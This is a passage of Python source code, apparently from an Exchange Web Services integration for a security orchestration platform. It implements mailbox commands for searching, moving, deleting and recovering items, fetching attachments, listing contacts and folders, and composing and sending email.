new_dict["itemId"] = raw_dict["id"]
fields_list.append("itemId")
for field in fields_list:
if field in raw_dict:
new_dict[field] = raw_dict.get(field)
for field in ["received_by", "author", "sender"]:
if field in raw_dict:
new_dict[field] = raw_dict.get(field, {}).get("email_address")
for field in ["to_recipients"]:
if field in raw_dict:
new_dict[field] = [x.get("email_address") for x in raw_dict[field]]
attachments = raw_dict.get("attachments")
if attachments and len(attachments) > 0:
file_attachments = [
x for x in attachments if x[ATTACHMENT_TYPE] == FILE_ATTACHMENT_TYPE
]
if len(file_attachments) > 0:
new_dict["FileAttachments"] = file_attachments
item_attachments = [
x for x in attachments if x[ATTACHMENT_TYPE] == ITEM_ATTACHMENT_TYPE
]
if len(item_attachments) > 0:
new_dict["ItemAttachments"] = item_attachments
raw_dict = new_dict
if camel_case:
raw_dict = keys_to_camel_case(raw_dict)
if email_address:
raw_dict[MAILBOX] = email_address
return raw_dict
def get_entry_for_file_attachment(item_id, attachment):
"""
Creates a file entry for an attachment
:param item_id: item_id of the attachment
:param attachment: attachment dict
:return: file entry dict for attachment
"""
entry = fileResult(get_attachment_name(attachment.name), attachment.content)
entry["EntryContext"] = {
CONTEXT_UPDATE_EWS_ITEM_FOR_ATTACHMENT
+ CONTEXT_UPDATE_FILE_ATTACHMENT: parse_attachment_as_dict(item_id, attachment)
}
return entry
def parse_attachment_as_dict(item_id, attachment):
"""
Creates a note entry for an attachment
:param item_id: item_id of the attachment
:param attachment: attachment dict
:return: note entry dict for attachment
"""
try:
attachment_content = (
attachment.content
if isinstance(attachment, FileAttachment)
else attachment.item.mime_content
)
return {
ATTACHMENT_ORIGINAL_ITEM_ID: item_id,
ATTACHMENT_ID: attachment.attachment_id.id,
"attachmentName": get_attachment_name(attachment.name),
"attachmentSHA256": hashlib.sha256(attachment_content).hexdigest()
if attachment_content
else None,
"attachmentContentType": attachment.content_type,
"attachmentContentId": attachment.content_id,
"attachmentContentLocation": attachment.content_location,
"attachmentSize": attachment.size,
"attachmentLastModifiedTime": attachment.last_modified_time.ewsformat(),
"attachmentIsInline": attachment.is_inline,
ATTACHMENT_TYPE: FILE_ATTACHMENT_TYPE
if isinstance(attachment, FileAttachment)
else ITEM_ATTACHMENT_TYPE,
}
except TypeError as e:
if str(e) != "must be string or buffer, not None":
raise
return {
ATTACHMENT_ORIGINAL_ITEM_ID: item_id,
ATTACHMENT_ID: attachment.attachment_id.id,
"attachmentName": get_attachment_name(attachment.name),
"attachmentSHA256": None,
"attachmentContentType": attachment.content_type,
"attachmentContentId": attachment.content_id,
"attachmentContentLocation": attachment.content_location,
"attachmentSize": attachment.size,
"attachmentLastModifiedTime": attachment.last_modified_time.ewsformat(),
"attachmentIsInline": attachment.is_inline,
ATTACHMENT_TYPE: FILE_ATTACHMENT_TYPE
if isinstance(attachment, FileAttachment)
else ITEM_ATTACHMENT_TYPE,
}
def get_entry_for_item_attachment(item_id, attachment, target_email):
"""
Creates a note entry for an item attachment
:param item_id: Item id
:param attachment: exchangelib attachment
:param target_email: target email
:return: note entry dict for item attachment
"""
item = attachment.item
dict_result = parse_attachment_as_dict(item_id, attachment)
dict_result.update(
parse_item_as_dict(item, target_email, camel_case=True, compact_fields=True)
)
title = f'EWS get attachment got item for "{target_email}", "{get_attachment_name(attachment.name)}"'
return get_entry_for_object(
title,
CONTEXT_UPDATE_EWS_ITEM_FOR_ATTACHMENT + CONTEXT_UPDATE_ITEM_ATTACHMENT,
dict_result,
)
""" Command Functions """
def get_expanded_group(client: EWSClient, email_address, recursive_expansion=False):
"""
Retrieve expanded group command
:param client: EWS Client
:param email_address: Email address of the group to expand
:param (Optional) recursive_expansion: Whether to enable recursive expansion. Default is "False".
:return: Expanded groups output tuple
"""
group_members = ExpandGroup(protocol=client.protocol).call(
email_address, recursive_expansion
)
group_details = {"name": email_address, "members": group_members}
output = {"EWS.ExpandGroup": group_details}
readable_output = tableToMarkdown("Group Members", group_members)
return readable_output, output, group_details
def get_searchable_mailboxes(client: EWSClient):
"""
Retrieve searchable mailboxes command
:param client: EWS Client
:return: Searchable mailboxes output tuple
"""
searchable_mailboxes = GetSearchableMailboxes(protocol=client.protocol).call()
readable_output = tableToMarkdown(
"Searchable mailboxes", searchable_mailboxes, headers=["displayName", "mailbox"]
)
output = {"EWS.Mailboxes": searchable_mailboxes}
return readable_output, output, searchable_mailboxes
def delete_attachments_for_message(
client: EWSClient, item_id, target_mailbox=None, attachment_ids=None
):
"""
Deletes attachments for a given message
:param client: EWS Client
:param item_id: item id
:param (Optional) target_mailbox: target mailbox
:param (Optional) attachment_ids: attachment ids to delete
:return: entries that were delted
"""
attachments = client.get_attachments_for_item(
item_id, target_mailbox, attachment_ids
)
deleted_file_attachments = []
deleted_item_attachments = [] # type: ignore
for attachment in attachments:
attachment_deleted_action = {
ATTACHMENT_ID: attachment.attachment_id.id,
ACTION: "deleted",
}
if isinstance(attachment, FileAttachment):
deleted_file_attachments.append(attachment_deleted_action)
else:
deleted_item_attachments.append(attachment_deleted_action)
attachment.detach()
entries = []
if len(deleted_file_attachments) > 0:
entry = get_entry_for_object(
"Deleted file attachments",
"EWS.Items" + CONTEXT_UPDATE_FILE_ATTACHMENT,
deleted_file_attachments,
)
entries.append(entry)
if len(deleted_item_attachments) > 0:
entry = get_entry_for_object(
"Deleted item attachments",
"EWS.Items" + CONTEXT_UPDATE_ITEM_ATTACHMENT,
deleted_item_attachments,
)
entries.append(entry)
return entries
def fetch_attachments_for_message(
client: EWSClient, item_id, target_mailbox=None, attachment_ids=None
):
"""
Fetches attachments for a message
:param client: EWS Client
:param item_id: item id
:param (Optional) target_mailbox: target mailbox
:param (Optional) attachment_ids: attachment ids
:return: list of parsed entries
"""
account = client.get_account(target_mailbox)
attachments = client.get_attachments_for_item(item_id, account, attachment_ids)
entries = []
for attachment in attachments:
if isinstance(attachment, FileAttachment):
try:
if attachment.content:
entries.append(get_entry_for_file_attachment(item_id, attachment))
except TypeError as e:
if str(e) != "must be string or buffer, not None":
raise
else:
entries.append(
get_entry_for_item_attachment(
item_id, attachment, account.primary_smtp_address
)
)
if attachment.item.mime_content:
entries.append(
fileResult(
get_attachment_name(attachment.name) + ".eml",
attachment.item.mime_content,
)
)
return entries
def move_item_between_mailboxes(
client: EWSClient,
item_id,
destination_mailbox,
destination_folder_path,
source_mailbox=None,
is_public=None,
):
"""
Moves item between mailboxes
:param client: EWS Client
:param item_id: item id
:param destination_mailbox: destination mailbox
:param destination_folder_path: destination folder path
:param (Optional) source_mailbox: source mailbox
:param (Optional) is_public: is the destination folder public
:return: Output tuple
"""
source_account = client.get_account(source_mailbox)
destination_account = client.get_account(destination_mailbox)
is_public = client.is_default_folder(destination_folder_path, is_public)
destination_folder = client.get_folder_by_path(
destination_folder_path, destination_account, is_public
)
item = client.get_item_from_mailbox(source_account, item_id)
exported_items = source_account.export([item])
destination_account.upload([(destination_folder, exported_items[0])])
source_account.bulk_delete([item])
move_result = {
MOVED_TO_MAILBOX: destination_mailbox,
MOVED_TO_FOLDER: destination_folder_path,
}
readable_output = "Item was moved successfully."
output = {f"EWS.Items(val.itemId === '{item_id}')": move_result}
return readable_output, output, move_result
def move_item(
client: EWSClient, item_id, target_folder_path, target_mailbox=None, is_public=None
):
"""
Moves an item within the same mailbox
:param client: EWS Client
:param item_id: item id
:param target_folder_path: target folder path
:param (Optional) target_mailbox: mailbox containing the item
:param (Optional) is_public: is the destination folder public
:return: Output tuple
"""
account = client.get_account(target_mailbox)
is_public = client.is_default_folder(target_folder_path, is_public)
target_folder = client.get_folder_by_path(target_folder_path, is_public=is_public)
item = client.get_item_from_mailbox(account, item_id)
if isinstance(item, ErrorInvalidIdMalformed):
raise Exception("Item not found")
item.move(target_folder)
move_result = {
NEW_ITEM_ID: item.id,
ITEM_ID: item_id,
MESSAGE_ID: item.message_id,
ACTION: "moved",
}
readable_output = tableToMarkdown("Moved items", move_result)
output = {CONTEXT_UPDATE_EWS_ITEM: move_result}
return readable_output, output, move_result
def delete_items(client: EWSClient, item_ids, delete_type, target_mailbox=None):
"""
Delete items in a mailbox
:param client: EWS Client
:param item_ids: items ids to delete
:param delete_type: delte type soft/hard
:param (Optional) target_mailbox: mailbox containinf the items
:return: Output tuple
"""
deleted_items = []
item_ids = argToList(item_ids)
items = client.get_items_from_mailbox(target_mailbox, item_ids)
delete_type = delete_type.lower()
for item in items:
item_id = item.id
if delete_type == "trash":
item.move_to_trash()
elif delete_type == "soft":
item.soft_delete()
elif delete_type == "hard":
item.delete()
else:
raise Exception(
f'invalid delete type: {delete_type}. Use "trash" \\ "soft" \\ "hard"'
)
deleted_items.append(
{
ITEM_ID: item_id,
MESSAGE_ID: item.message_id,
ACTION: f"{delete_type}-deleted",
}
)
readable_output = tableToMarkdown(
f"Deleted items ({delete_type} delete type)", deleted_items
)
output = {CONTEXT_UPDATE_EWS_ITEM: deleted_items}
return readable_output, output, deleted_items
def search_items_in_mailbox(
client: EWSClient,
query=None,
message_id=None,
folder_path="",
limit=100,
target_mailbox=None,
is_public=None,
selected_fields="all",
):
"""
Search items in mailbox
:param client: EWS Client
:param (Optional) query: query to execute
:param (Optional) message_id: message ids to search
:param (Optional) folder_path: folder path to search
:param (Optional) limit: max amount of items to fetch
:param (Optional) target_mailbox: mailbox containing the items
:param (Optional) is_public: is the targeted folder public
:param (Optional) selected_fields: Selected fields
:return: Output tuple
"""
if not query and not message_id:
return_error("Missing required argument. Provide query or message-id")
if message_id and message_id[0] != "<" and message_id[-1] != ">":
message_id = "<{}>".format(message_id)
account = client.get_account(target_mailbox)
limit = int(limit)
if folder_path.lower() == "inbox":
folders = [account.inbox]
elif folder_path:
is_public = client.is_default_folder(folder_path, is_public)
folders = [client.get_folder_by_path(folder_path, account, is_public)]
else:
folders = account.inbox.parent.walk() # pylint: disable=E1101
items = [] # type: ignore
selected_all_fields = selected_fields == "all"
if selected_all_fields:
restricted_fields = list([x.name for x in Message.FIELDS]) # type: ignore
else:
restricted_fields = set(argToList(selected_fields)) # type: ignore
restricted_fields.update(["id", "message_id"]) # type: ignore
for folder in folders:
if Message not in folder.supported_item_models:
continue
if query:
items_qs = folder.filter(query).only(*restricted_fields)
else:
items_qs = folder.filter(message_id=message_id).only(*restricted_fields)
items += get_limited_number_of_messages_from_qs(items_qs, limit)
if len(items) >= limit:
break
items = items[:limit]
searched_items_result = [
parse_item_as_dict(
item,
account.primary_smtp_address,
camel_case=True,
compact_fields=selected_all_fields,
)
for item in items
]
if not selected_all_fields:
searched_items_result = [
{k: v for (k, v) in i.items() if k in keys_to_camel_case(restricted_fields)}
for i in searched_items_result
]
for item in searched_items_result:
item["itemId"] = item.pop("id", "")
readable_output = tableToMarkdown(
"Searched items",
searched_items_result,
headers=ITEMS_RESULTS_HEADERS if selected_all_fields else None,
)
output = {CONTEXT_UPDATE_EWS_ITEM: searched_items_result}
return readable_output, output, searched_items_result
def get_out_of_office_state(client: EWSClient, target_mailbox=None):
"""
Retrieve get out of office state of the targeted mailbox
:param client: EWS Client
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
account = client.get_account(target_mailbox)
oof = account.oof_settings
oof_dict = {
"state": oof.state, # pylint: disable=E1101
"externalAudience": getattr(oof, "external_audience", None),
"start": oof.start.ewsformat() if oof.start else None, # pylint: disable=E1101
"end": oof.end.ewsformat() if oof.end else None, # pylint: disable=E1101
"internalReply": getattr(oof, "internal_replay", None),
"externalReply": getattr(oof, "external_replay", None),
MAILBOX: account.primary_smtp_address,
}
readable_output = tableToMarkdown(
f"Out of office state for {account.primary_smtp_address}", oof_dict
)
output = {f"Account.Email(val.Address == obj.{MAILBOX}).OutOfOffice": oof_dict}
return readable_output, output, oof_dict
def recover_soft_delete_item(
client: EWSClient,
message_ids,
target_folder_path="Inbox",
target_mailbox=None,
is_public=None,
):
"""
Recovers soft deleted items
:param client: EWS Client
:param message_ids: Message ids to recover
:param (Optional) target_folder_path: target folder path
:param (Optional) target_mailbox: target mailbox
:param (Optional) is_public: is the target folder public
:return:
"""
account = client.get_account(target_mailbox)
is_public = client.is_default_folder(target_folder_path, is_public)
target_folder = client.get_folder_by_path(target_folder_path, account, is_public)
recovered_messages = []
message_ids = argToList(message_ids)
items_to_recover = account.recoverable_items_deletions.filter( # pylint: disable=E1101
message_id__in=message_ids
).all() # pylint: disable=E1101
recovered_items = set()
for item in items_to_recover:
recovered_items.add(item)
if len(recovered_items) != len(message_ids):
missing_items = set(message_ids).difference(recovered_items)
raise Exception(
f"Some message ids are missing in recoverable items directory: {missing_items}"
)
for item in recovered_items:
item.move(target_folder)
recovered_messages.append(
{ITEM_ID: item.id, MESSAGE_ID: item.message_id, ACTION: "recovered"}
)
readable_output = tableToMarkdown("Recovered messages", recovered_messages)
output = {CONTEXT_UPDATE_EWS_ITEM: recovered_messages}
return readable_output, output, recovered_messages
def get_contacts(client: EWSClient, limit, target_mailbox=None):
"""
Retrieve contacts of the target mailbox or client mailbox
:param client: EWS Client
:param limit: max amount of contacts to retrieve
:param (Optional) target_mailbox: Target mailbox
:return:
"""
def parse_physical_address(address):
result = {}
for attr in ["city", "country", "label", "state", "street", "zipcode"]:
result[attr] = getattr(address, attr, None)
return result
def parse_phone_number(phone_number):
result = {}
for attr in ["label", "phone_number"]:
result[attr] = getattr(phone_number, attr, None)
return result
def parse_contact(contact):
contact_dict = dict(
(k, v if not isinstance(v, EWSDateTime) else v.ewsformat())
for k, v in list(contact._field_vals())
if isinstance(v, str) or isinstance(v, EWSDateTime)
)
if isinstance(contact, Contact) and contact.physical_addresses:
contact_dict["physical_addresses"] = list(
map(parse_physical_address, contact.physical_addresses)
)
if isinstance(contact, Contact) and contact.phone_numbers:
contact_dict["phone_numbers"] = list(
map(parse_phone_number, contact.phone_numbers)
)
if (
isinstance(contact, Contact)
and contact.email_addresses
and len(contact.email_addresses) > 0
):
contact_dict["emailAddresses"] = [x.email for x in contact.email_addresses]
contact_dict = keys_to_camel_case(contact_dict)
contact_dict = dict((k, v) for k, v in list(contact_dict.items()) if v)
contact_dict.pop("mimeContent", None)
contact_dict["originMailbox"] = target_mailbox
return contact_dict
account = client.get_account(target_mailbox)
contacts = []
for contact in account.contacts.all()[: int(limit)]: # pylint: disable=E1101
contacts.append(parse_contact(contact))
readable_output = tableToMarkdown(f"Email contacts for {target_mailbox}", contacts)
output = {"Account.Email(val.Address == obj.originMailbox).EwsContacts": contacts}
return readable_output, output, contacts
def create_folder(client: EWSClient, new_folder_name, folder_path, target_mailbox=None):
"""
Creates a folder in the target mailbox or the client mailbox
:param client: EWS Client
:param new_folder_name: new folder name
:param folder_path: path of the new folder
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
account = client.get_account(target_mailbox)
full_path = os.path.join(folder_path, new_folder_name)
try:
if client.get_folder_by_path(full_path, account):
return f"Folder {full_path} already exists",
except Exception:
pass
parent_folder = client.get_folder_by_path(folder_path, account)
f = Folder(parent=parent_folder, name=new_folder_name)
f.save()
client.get_folder_by_path(full_path, account)
return f"Folder {full_path} created successfully",
def find_folders(client: EWSClient, target_mailbox=None):
"""
Finds folders in the mailbox
:param client: EWS Client
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
account = client.get_account(target_mailbox)
root = account.root
if client.is_public_folder:
root = account.public_folders_root
folders = []
for f in root.walk(): # pylint: disable=E1101
folder = folder_to_context_entry(f)
folders.append(folder)
folders_tree = root.tree() # pylint: disable=E1101
readable_output = folders_tree
output = {"EWS.Folders(val.id == obj.id)": folders}
return readable_output, output, folders
def mark_item_as_junk(client: EWSClient, item_id, move_items, target_mailbox=None):
"""
Marks item as junk in the target mailbox or client mailbox
:param client: EWS Client
:param item_id: item ids to mark as junk
:param move_items: "yes" or "no" - to move or not to move to trash
:param (Optional) target_mailbox: target mailbox
:return:
"""
account = client.get_account(target_mailbox)
move_items = move_items.lower() == "yes"
ews_result = MarkAsJunk(account=account).call(item_id=item_id, move_item=move_items)
mark_as_junk_result = {
ITEM_ID: item_id,
}
if ews_result == "Success":
mark_as_junk_result[ACTION] = "marked-as-junk"
else:
raise Exception("Failed mark-item-as-junk with error: " + ews_result)
readable_output = tableToMarkdown("Mark item as junk", mark_as_junk_result)
output = {CONTEXT_UPDATE_EWS_ITEM: mark_as_junk_result}
return readable_output, output, mark_as_junk_result
def get_items_from_folder(
client: EWSClient,
folder_path,
limit=100,
target_mailbox=None,
is_public=None,
get_internal_item="no",
):
"""
Retrieve items from folder path
:param client: EWS Client
:param folder_path: folder path
:param (Optional) limit: max amount of items to retrieve
:param (Optional) target_mailbox: target mailbox
:param (Optional) is_public: is the folder public
:param (Optional) get_internal_item: should also retrieve internal items ("no" by default)
:return: Output tuple
"""
account = client.get_account(target_mailbox)
limit = int(limit)
get_internal_item = get_internal_item == "yes"
is_public = client.is_default_folder(folder_path, is_public)
folder = client.get_folder_by_path(folder_path, account, is_public)
qs = folder.filter().order_by("-datetime_created")[:limit]
items = get_limited_number_of_messages_from_qs(qs, limit)
items_result = []
for item in items:
item_attachment = parse_item_as_dict(
item, account.primary_smtp_address, camel_case=True, compact_fields=True
)
for attachment in item.attachments:
if (
get_internal_item
and isinstance(attachment, ItemAttachment)
and isinstance(attachment.item, Message)
):
# if found item attachment - switch item to the attchment
item_attachment = parse_item_as_dict(
attachment.item,
account.primary_smtp_address,
camel_case=True,
compact_fields=True,
)
break
items_result.append(item_attachment)
hm_headers = [
"sender",
"subject",
"hasAttachments",
"datetimeReceived",
"receivedBy",
"author",
"toRecipients",
"itemId",
]
readable_output = tableToMarkdown(
"Items in folder " + folder_path, items_result, headers=hm_headers
)
output = {CONTEXT_UPDATE_EWS_ITEM: items_result}
return readable_output, output, items_result
def get_items(client: EWSClient, item_ids, target_mailbox=None):
"""
Get items from target mailbox or client mailbox
:param client: EWS Client
:param item_ids: item ids to retrieve
:param (Optional) target_mailbox: target mailbox to retrieve items from
:return:
"""
item_ids = argToList(item_ids)
account = client.get_account(target_mailbox)
items = client.get_items_from_mailbox(account, item_ids)
items = [x for x in items if isinstance(x, Message)]
items_as_incidents = [parse_incident_from_item(x) for x in items]
items_to_context = [
parse_item_as_dict(x, account.primary_smtp_address, True, True) for x in items
]
readable_output = tableToMarkdown(
"Get items", items_to_context, ITEMS_RESULTS_HEADERS
)
output = {
CONTEXT_UPDATE_EWS_ITEM: items_to_context,
"Email": [email_ec(item) for item in items],
}
return readable_output, output, items_as_incidents
def get_folder(client: EWSClient, folder_path, target_mailbox=None, is_public=None):
"""
Retrieve a folder from the target mailbox or client mailbox
:param client: EWS Client
:param folder_path: folder path to retrieve
:param (Optional) target_mailbox: target mailbox
:param (Optional) is_public: is the folder public
:return:
"""
account = client.get_account(target_mailbox)
is_public = client.is_default_folder(folder_path, is_public)
folder = folder_to_context_entry(
client.get_folder_by_path(folder_path, account=account, is_public=is_public)
)
readable_output = tableToMarkdown(f"Folder {folder_path}", folder)
output = {CONTEXT_UPDATE_FOLDER: folder}
return readable_output, output, folder
def folder_to_context_entry(f):
"""
Create a context entry from a folder response
:param f: folder response
:return: dict context entry
"""
try:
f_entry = {
"name": f.name,
"totalCount": f.total_count,
"id": f.id,
"childrenFolderCount": f.child_folder_count,
"changeKey": f.changekey,
}
if "unread_count" in [x.name for x in Folder.FIELDS]:
f_entry["unreadCount"] = f.unread_count
return f_entry
except AttributeError:
if isinstance(f, dict):
return {
"name": f.get("name"),
"totalCount": f.get("total_count"),
"id": f.get("id"),
"childrenFolderCount": f.get("child_folder_count"),
"changeKey": f.get("changekey"),
"unreadCount": f.get("unread_count"),
}
def mark_item_as_read(
client: EWSClient, item_ids, operation="read", target_mailbox=None
):
"""
Marks item as read
:param client: EWS Client
:param item_ids: items ids to mark as read
:param (Optional) operation: operation to execute
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
marked_items = []
item_ids = argToList(item_ids)
items = client.get_items_from_mailbox(target_mailbox, item_ids)
items = [x for x in items if isinstance(x, Message)]
for item in items:
item.is_read = operation == "read"
item.save()
marked_items.append(
{
ITEM_ID: item.id,
MESSAGE_ID: item.message_id,
ACTION: "marked-as-{}".format(operation),
}
)
readable_output = tableToMarkdown(
f"Marked items ({operation} marked operation)", marked_items
)
output = {CONTEXT_UPDATE_EWS_ITEM: marked_items}
return readable_output, output, marked_items
def random_word_generator(length):
"""Generate a random string of given length
"""
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(length))
def handle_html(html_body):
"""
Extract all data-url content from within the html and return as separate attachments.
Due to security implications, we support only images here
We might not have Beautiful Soup so just do regex search
"""
attachments = []
clean_body = ''
last_index = 0
for i, m in enumerate(
re.finditer(r'<img.+?src=\"(data:(image\/.+?);base64,([a-zA-Z0-9+/=\r\n]+?))\"', html_body, re.I)):
attachment = {
'data': base64.b64decode(m.group(3)),
'name': f'image{i}'
}
attachment['cid'] = f'{attachment["name"]}@{random_word_generator(8)}.{random_word_generator(8)}'
attachments.append(attachment)
clean_body += html_body[last_index:m.start(1)] + 'cid:' + attachment['cid']
last_index = m.end() - 1
clean_body += html_body[last_index:]
return clean_body, attachments
def collect_manual_attachments(manualAttachObj):
"""Collect all manual attachments' data
Args:
manualAttachObj (str): String representation of the manually attached files list.
Returns:
List[Dict]. List of the files data.
"""
manually_attached_objects = argToList(manualAttachObj)
attachments = []
for attachment in manually_attached_objects:
file_res = demisto.getFilePath(os.path.basename(attachment['RealFileName']))
path = file_res['path']
with open(path, 'rb') as fp:
data = fp.read()
attachments.append({
'name': attachment['FileName'],
'data': data,
'cid': ''
})
return attachments
def collect_attachments(attachments_ids, attachments_cids, attachments_names):
"""Collect all attachments' data
Args:
attachments_ids (str): String representation of the files ids list.
attachments_cids (str): String representation of the files content ids list.
attachments_names (str): String representation of the files names list.
Returns:
List[Dict]. List of the files data.
"""
attachments = []
files_ids = argToList(attachments_ids)
files_cids = argToList(attachments_cids)
files_names = argToList(attachments_names)
for index, file_id in enumerate(files_ids):
try:
file_res = demisto.getFilePath(file_id)
path = file_res['path']
if len(files_names) > index and files_names[index]:
filename = files_names[index]
else:
filename = file_res['name']
if len(files_cids) > index and files_cids[index]:
cid = files_cids[index]
else:
cid = ''
with open(path, 'rb') as fp:
data = fp.read()
attachments.append({
'name': filename,
'data': data,
'cid': cid
})
except Exception as e:
demisto.error(f'Invalid entry {file_id} with exception: {e}')
return_error(f'Entry {file_id} is not valid or is not a file entry')
return attachments
def handle_transient_files(transient_files, transient_files_contents, transient_files_cids):
"""Creates the transient attachments data
Args:
transient_files (str): String representation of the transient files names list.
transient_files_contents (str): String representation of the transient files content list.
transient_files_cids (str): String representation of the transient files content ids list.
Returns:
List[Dict]. List of the transient files data.
"""
transient_attachments = []
files_names = argToList(transient_files)
files_contents = argToList(transient_files_contents)
files_cids = argToList(transient_files_cids)
for index in range(len(files_names)):
file_name = files_names[index]
if index >= len(files_contents):
break
file_content = bytes(files_contents[index], UTF_8)
if index >= len(files_cids):
file_cid = ''
else:
file_cid = files_cids[index]
transient_attachments.append({
'name': file_name,
'data': file_content,
'cid': file_cid
})
return transient_attachments
def handle_template_params(template_params):
"""Translates the template params if they exist from the context
Args:
template_params (str): JSON string that represent the variables names to be replaced and the desired value.
Value can be either real value or context key to fetch the value from.
Returns:
Dict. `variable_name: value_to_use` of the templated parameters.
"""
actual_params = {}
if template_params:
try:
params = json.loads(template_params)
for p in params:
if params[p].get('value'):
actual_params[p] = params[p]['value']
elif params[p].get('key'):
actual_params[p] = demisto.dt(demisto.context(), params[p]['key'])
except ValueError as e:
return_error('Unable to parse template_params: %s' % (str(e)))
return actual_params
def create_message_object(to, cc, bcc, subject, body, additional_headers):
"""Creates the message object according to the existence of additional custom headers.
"""
if additional_headers:
return Message(
to_recipients=to,
cc_recipients=cc,
bcc_recipients=bcc,
subject=subject,
body=body,
**additional_headers
)
return Message(
to_recipients=to,
cc_recipients=cc,
bcc_recipients=bcc,
subject=subject,
body=body
)
def create_message(to, subject='', body='', bcc=None, cc=None, html_body=None, attachments=None,
additional_headers=None):
"""Creates the Message object that will be sent.
Args:
to (list): Main recipients.
cc (list): CC recipients.
bcc (list): BCC recipients.
subject (str): Email's subject.
body (str): Email's simple text body.
html_body (str): Email's html body.
attachments (list): Files to be attached to the mail, both inline and as files.
additional_headers (Dict): Custom headers to be added to the message.
Returns:
Message. Message object ready to be sent.
"""
if not html_body:
# This is a simple text message - we cannot have CIDs here
message = create_message_object(to, cc, bcc, subject, body, additional_headers)
for attachment in attachments:
if not attachment.get('cid'):
new_attachment = FileAttachment(name=attachment.get('name'), content=attachment.get('data'))
message.attach(new_attachment)
else:
html_body, html_attachments = handle_html(html_body)
attachments += html_attachments
message = create_message_object(to, cc, bcc, subject, HTMLBody(html_body), additional_headers)
for attachment in attachments:
if not attachment.get('cid'):
new_attachment = FileAttachment(name=attachment.get('name'), content=attachment.get('data'))
else:
new_attachment = FileAttachment(name=attachment.get('name'), content=attachment.get('data'),
is_inline=True, content_id=attachment.get('cid'))
message.attach(new_attachment)
return message
def add_additional_headers(additional_headers):
"""Adds custom headers to the Message object
Args:
additional_headers (str): Headers list as string. Example: headerName1=headerValue1,headerName2=headerValue2
Returns:
Dict. Headers dictionary in the form of: `header_name: header value`
"""
headers = dict()
for header in argToList(additional_headers):
header_name, header_value = header.split('=', 1)
class TempClass(ExtendedProperty):
distinguished_property_set_id = 'InternetHeaders'
property_name = header_name
property_type = 'String'
try:
Message.register(header_name, TempClass)
headers[header_name] = header_value
except ValueError as e:
demisto.debug('EWSO365 - Header ' + header_name + ' could not be registered. ' + str(e))
return headers
def send_email(client: EWSClient, to, subject='', body="", bcc=None, cc=None, htmlBody=None,
attachIDs="", attachCIDs="", attachNames="", manualAttachObj=None,
transientFile=None, transientFileContent=None, transientFileCID=None, templateParams=None,
additionalHeader=None, raw_message=None):
to = argToList(to)
cc = argToList(cc)
bcc = argToList(bcc)
# Basic validation - we allow pretty much everything but you have to have at least a recipient
# We allow messages without subject and also without body
if not to and not cc and not bcc:
return_error('You must have at least one recipient')
if raw_message:
message = Message(
to_recipients=to,
cc_recipients=cc,
bcc_recipients=bcc,
body=raw_message
)
else:
if additionalHeader:
additionalHeader = add_additional_headers(additionalHeader)
# collect all types of attachments
attachments = collect_attachments(attachIDs, attachCIDs, attachNames)
attachments.extend(collect_manual_attachments(manualAttachObj))
attachments.extend(handle_transient_files(transientFile, transientFileContent, transientFileCID))
# update body and html_body with the templated params, if exists
template_params = handle_template_params(templateParams)
if template_params:
body = body.format(**template_params)
if htmlBody:
htmlBody = htmlBody.format(**template_params)
message = create_message(to, subject, body, bcc, cc, htmlBody, attachments, additionalHeader)
client.send_email(message)
return 'Mail sent successfully', {}, {}
def get_item_as_eml(client: EWSClient, item_id, target_mailbox=None):
"""
Retrieve item as an eml
:param client: EWS Client
:param item_id: Item id to retrieve
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
account = client.get_account(target_mailbox)
item = client.get_item_from_mailbox(account, item_id)
if item.mime_content:
mime_content = item.mime_content
if isinstance(mime_content, bytes):
email_content = email.message_from_bytes(mime_content)
else:
email_content = email.message_from_string(mime_content)
if item.headers:
attached_email_headers = [
(h, " ".join(map(str.strip, v.split("\r\n"))))
for (h, v) in list(email_content.items())
]
for header in item.headers:
if (
header.name,
header.value,
) not in attached_email_headers and header.name != "Content-Type":
email_content.add_header(header.name, header.value)
eml_name = item.subject if item.subject else "demisto_untitled_eml"
file_result = fileResult(eml_name + ".eml", email_content.as_string())
file_result = (
file_result if file_result else "Failed uploading eml file to war room"
)
return file_result
def parse_incident_from_item(item):
"""
Parses an incident from an item
:param item: item to parse
:return: Parsed item
"""
incident = {}
labels = []
try:
incident["details"] = item.text_body or item.body
except AttributeError:
incident["details"] = item.body
incident["name"] = item.subject
labels.append({"type": "Email/subject", "value": item.subject})
incident["occurred"] = item.datetime_created.ewsformat()
# handle recipients
if item.to_recipients:
for recipient in item.to_recipients:
labels.append({"type": "Email", "value": recipient.email_address})
# handle cc
if item.cc_recipients:
for recipient in item.cc_recipients:
labels.append({"type": "Email/cc", "value": recipient.email_address})
# handle email from
if item.sender:
labels.append({"type": "Email/from", "value": item.sender.email_address})
# email format
email_format = ""
try:
if item.text_body:
labels.append({"type": "Email/text", "value": item.text_body})
email_format = "text"
except AttributeError:
pass
if item.body:
labels.append({"type": "Email/html", "value": item.body})
email_format = "HTML"
labels.append({"type": "Email/format", "value": email_format})
# handle attachments
if item.attachments:
incident["attachment"] = []
for attachment in item.attachments:
file_result = None
label_attachment_type = None
label_attachment_id_type = None
if isinstance(attachment, FileAttachment):
try:
if attachment.content:
# file attachment
label_attachment_type = "attachments"
label_attachment_id_type = "attachmentId"
# save the attachment
file_name = get_attachment_name(attachment.name)
file_result = fileResult(file_name, attachment.content)
# check for error
if file_result["Type"] == entryTypes["error"]:
demisto.error(file_result["Contents"])
raise Exception(file_result["Contents"])
# save attachment to incident
incident["attachment"].append(
{
"path": file_result["FileID"],
"name": get_attachment_name(attachment.name),
}
)
except TypeError as e:
if str(e) != "must be string or buffer, not None":
raise
continue
else:
# other item attachment
label_attachment_type = "attachmentItems"
label_attachment_id_type = "attachmentItemsId"
# save the attachment
if attachment.item.mime_content:
mime_content = attachment.item.mime_content
attached_email = email.message_from_bytes(mime_content) if isinstance(mime_content, bytes) \
else email.message_from_string(mime_content)
if attachment.item.headers:
attached_email_headers = [
(h, " ".join(map(str.strip, v.split("\r\n"))))
for (h, v) in list(attached_email.items())
]
for header in attachment.item.headers:
if (
(header.name, header.value)
not in attached_email_headers
and header.name != "Content-Type"
):
attached_email.add_header(header.name, header.value)
attached_email_bytes = attached_email.as_bytes()
chardet_detection = chardet.detect(attached_email_bytes)
encoding = chardet_detection.get('encoding', 'utf-8') or 'utf-8'
try:
